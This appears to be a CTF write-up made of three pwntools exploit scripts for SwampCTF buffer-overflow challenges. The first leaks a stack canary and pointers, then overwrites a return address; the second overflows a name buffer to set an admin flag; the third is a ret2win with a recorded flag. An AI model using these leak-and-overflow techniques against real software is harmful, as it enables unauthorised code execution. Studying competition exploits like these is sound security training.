dplastico

Oh my Buffer

A buffer overflow in 2025

#!/usr/bin/env python3

from pwn import *

elf = ELF("./binary_patched")  # "_patched" suggests the challenge libc/ld were patched in (pwninit-style) — confirm

context.binary = elf  # arch/bits/endianness for p64/u64 and friends are taken from the binary
context.terminal = ['tmux', 'splitw', '-hp', '70']  # where gdb.debug() opens its window
#context.log_level = "debug"
# gdbscript used by start() when run with GDB=1: break on the binary's
# login and reg functions, then let it run
gs = '''
b login
b reg
continue
'''

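def one_gadget(filename, base_addr=0):
    """Return the one_gadget offsets of *filename*, each rebased by *base_addr*.

    Shells out to the ``one_gadget`` tool with ``--raw -l1``, which prints
    the candidate addresses as whitespace-separated integers.  The filename
    is passed as its own argv element (no shell), so an odd path cannot
    inject into the command line.

    Raises FileNotFoundError if the tool is not on PATH and
    subprocess.CalledProcessError if it exits non-zero.
    """
    out = subprocess.check_output(['one_gadget', '--raw', '-l1', filename])
    # split() instead of split(' '): tolerates the trailing newline, runs of
    # spaces, and empty output (the old int('') on empty output raised).
    return [int(tok) + base_addr for tok in out.decode().split()]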
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    """Return the tube to attack, selected by pwntools' command-line args.

    REMOTE=1 connects to the live challenge, GDB=1 launches the local
    binary under gdb with the ``gs`` script, otherwise the local binary
    runs as a plain process.
    """
    if args.REMOTE:
        return remote("chals.swampctf.com", 40005)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)

r = start()

def rcu(d1, d2=0):
    """recv-until helper on the global tube.

    Consumes everything up to and including *d1*.  With a truthy *d2* it
    keeps reading up to *d2* and returns the bytes between the two
    delimiters (both dropped); otherwise it returns None.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log libc's base address.

    NOTE(review): nothing in this script assigns ``libc``, so calling this
    raises NameError until a libc ELF is bound to that name.
    """
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log a leaked integer as ``<name> = 0x...``."""
    return log.info(name + " = %#x" % val)


def sa(delim, data):
    """Send *data* (no newline) once *delim* has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* plus a newline once *delim* has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* plus a newline."""
    return r.sendline(line)


def bc(value):
    """Render *value* through str() as ASCII bytes (ints become decimal digits)."""
    return str(value).encode("ascii")


def demangle_base(value):
    """Shift a >>12 heap value back up by 12 bits (glibc safe-linking style)."""
    return value << 12


def remangle(heap_base, value):
    """XOR *value* with *heap_base* >> 12 (glibc safe-linking style mangling)."""
    return (heap_base >> 12) ^ value


def reg(user, password):
    """Pick menu option 1 and register *user* / *password*.

    Both values are sent with a trailing newline after their prompts; in
    the exploit section the password is what carries the overflow payload.
    """
    sl(b"1")
    for prompt, value in ((b"name: ", user), (b"Password: ", password)):
        sla(prompt, value)

# used by the exploit section to obtain the leak: an oversized declared length with a short name makes the "couldn't find the user" reply echo back extra bytes
def login(size, user):
    """Pick menu option 2, declare a username length of *size*, then send
    *user* (no trailing newline) after the "Username: " prompt.

    The exploit section calls this with size 0x70 and an 8-byte name; the
    server's "couldn't find the user" reply then echoes more than the name,
    which is where the leak comes from.
    """
    sl(b"2")
    sla(b"How long is your username: ", bc(size))
    sa(b"Username: ", user)
#========= exploit here ===================
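# Drain the menu prompt, then trigger the leak: declare a 0x70-byte username
# but send only 8 bytes, so the "couldn't find the user" reply echoes back
# whatever follows the name in memory.
rcu(b">")
login(0x70, b"BBBBBBBB")
leak = rcu(b"Sorry, we couldn't find the user: BBBBBBBB", b"===================")
# Everything below slices fixed offsets out of the echo; fail loudly instead
# of dying inside u64() with a confusing struct error if the reply is short.
if len(leak) < 0x40:
    log.error("leak too short (%d bytes): %r", len(leak), leak)
bin_leak = u64(leak[:0x8].ljust(8, b"\x00"))
canary = u64(leak[0x10:0x18])
stack_leak = u64(leak[0x18:0x20])
heap_leak = u64(leak[0x38:0x40])
flag_loc = heap_leak + 0x1e0  # fixed distance from the leaked heap pointer (observed, not derived here)
rcu(b">")
##win 4013D8?
logleak("bin leak", bin_leak)
logleak("canary", canary)
logleak("stack leak", stack_leak)  # was logging heap_leak under this label
logleak("heap leak", heap_leak)

payload = b"A" * 0x10
payload += p64(0xdeadbeef)       # inner frame's rbp slot; value never used
payload += p64(canary)           # must reproduce the leaked canary exactly or the check aborts
payload += p64(flag_loc + 0x20)  # rbp: point the frame at writable heap memory near the flag
payload += p64(0x40139B)         # return address; hard-coded, so this assumes the patched binary is not PIE

reg(b"Y" * 8, payload)
##========= interactive ====================
r.interactive()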

pwn1

#!/usr/bin/env python3

from pwn import *

elf = ELF("./is_admin_patched")  # "_patched" suggests the challenge libc/ld were patched in (pwninit-style) — confirm

context.binary = elf  # arch/bits/endianness for the packing helpers come from the binary
context.terminal = ['tmux', 'splitw', '-hp', '70']  # where gdb.debug() opens its window
#context.log_level = "debug"
# gdbscript used by start() when run with GDB=1: no breakpoints, just run
gs = '''
continue
'''

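def one_gadget(filename, base_addr=0):
    """Return the one_gadget offsets of *filename*, each rebased by *base_addr*.

    Shells out to the ``one_gadget`` tool with ``--raw -l1``, which prints
    the candidate addresses as whitespace-separated integers.  The filename
    is passed as its own argv element (no shell), so an odd path cannot
    inject into the command line.

    Raises FileNotFoundError if the tool is not on PATH and
    subprocess.CalledProcessError if it exits non-zero.
    """
    out = subprocess.check_output(['one_gadget', '--raw', '-l1', filename])
    # split() instead of split(' '): tolerates the trailing newline, runs of
    # spaces, and empty output (the old int('') on empty output raised).
    return [int(tok) + base_addr for tok in out.decode().split()]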
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    """Return the tube to attack, selected by pwntools' command-line args.

    REMOTE=1 connects to the live challenge, GDB=1 launches the local
    binary under gdb with the ``gs`` script, otherwise the local binary
    runs as a plain process.
    """
    if args.REMOTE:
        return remote("chals.swampctf.com", 40004)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)

r = start()

def rcu(d1, d2=0):
    """recv-until helper on the global tube.

    Consumes everything up to and including *d1*.  With a truthy *d2* it
    keeps reading up to *d2* and returns the bytes between the two
    delimiters (both dropped); otherwise it returns None.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log libc's base address.

    NOTE(review): nothing in this script assigns ``libc``, so calling this
    raises NameError until a libc ELF is bound to that name.
    """
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log a leaked integer as ``<name> = 0x...``."""
    return log.info(name + " = %#x" % val)


def sa(delim, data):
    """Send *data* (no newline) once *delim* has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* plus a newline once *delim* has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* plus a newline."""
    return r.sendline(line)


def bc(value):
    """Render *value* through str() as ASCII bytes (ints become decimal digits)."""
    return str(value).encode("ascii")


def demangle_base(value):
    """Shift a >>12 heap value back up by 12 bits (glibc safe-linking style)."""
    return value << 12


def remangle(heap_base, value):
    """XOR *value* with *heap_base* >> 12 (glibc safe-linking style mangling)."""
    return (heap_base >> 12) ^ value

#========= exploit here ===================
# Short timeout so a stuck tube fails fast instead of hanging interactive().
r.timeout = 1
# 0xe filler bytes is all this one needs; the binary name (is_admin) suggests
# the byte right after the name buffer is the admin flag — confirm in the
# disassembly.  An earlier attempt appended more to the payload.
payload = b"A" * 0xe
sla(b"please enter your name:", payload)

#========= interactive ====================
r.interactive()

pwn2

#!/usr/bin/env python3

from pwn import *

elf = ELF("./binary_patched")  # "_patched" suggests the challenge libc/ld were patched in (pwninit-style) — confirm

context.binary = elf  # arch/bits/endianness for p64 and friends come from the binary
context.terminal = ['tmux', 'splitw', '-hp', '70']  # where gdb.debug() opens its window
#context.log_level = "debug"
# gdbscript used by start() when run with GDB=1: no breakpoints, just run
gs = '''
continue
'''

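def one_gadget(filename, base_addr=0):
    """Return the one_gadget offsets of *filename*, each rebased by *base_addr*.

    Shells out to the ``one_gadget`` tool with ``--raw -l1``, which prints
    the candidate addresses as whitespace-separated integers.  The filename
    is passed as its own argv element (no shell), so an odd path cannot
    inject into the command line.

    Raises FileNotFoundError if the tool is not on PATH and
    subprocess.CalledProcessError if it exits non-zero.
    """
    out = subprocess.check_output(['one_gadget', '--raw', '-l1', filename])
    # split() instead of split(' '): tolerates the trailing newline, runs of
    # spaces, and empty output (the old int('') on empty output raised).
    return [int(tok) + base_addr for tok in out.decode().split()]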
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    """Return the tube to attack, selected by pwntools' command-line args.

    REMOTE=1 connects to the live challenge, GDB=1 launches the local
    binary under gdb with the ``gs`` script, otherwise the local binary
    runs as a plain process.
    """
    if args.REMOTE:
        return remote("chals.swampctf.com", 40001)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)

r = start()

def rcu(d1, d2=0):
    """recv-until helper on the global tube.

    Consumes everything up to and including *d1*.  With a truthy *d2* it
    keeps reading up to *d2* and returns the bytes between the two
    delimiters (both dropped); otherwise it returns None.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log libc's base address.

    NOTE(review): nothing in this script assigns ``libc``, so calling this
    raises NameError until a libc ELF is bound to that name.
    """
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log a leaked integer as ``<name> = 0x...``."""
    return log.info(name + " = %#x" % val)


def sa(delim, data):
    """Send *data* (no newline) once *delim* has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* plus a newline once *delim* has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* plus a newline."""
    return r.sendline(line)


def bc(value):
    """Render *value* through str() as ASCII bytes (ints become decimal digits)."""
    return str(value).encode("ascii")


def demangle_base(value):
    """Shift a >>12 heap value back up by 12 bits (glibc safe-linking style)."""
    return value << 12


def remangle(heap_base, value):
    """XOR *value* with *heap_base* >> 12 (glibc safe-linking style mangling)."""
    return (heap_base >> 12) ^ value

#========= exploit here ===================
# 0x12 bytes of filler presumably reach the saved return address, which is
# overwritten with a hard-coded target — that only works if the patched
# binary is not PIE, otherwise the address changes every run.
payload = b"A" * 0x12 + p64(0x401186)
sl(payload)
# flag obtained with this: swampCTF{1t5_t1m3_t0_r3turn!!}
#========= interactive ====================
r.interactive()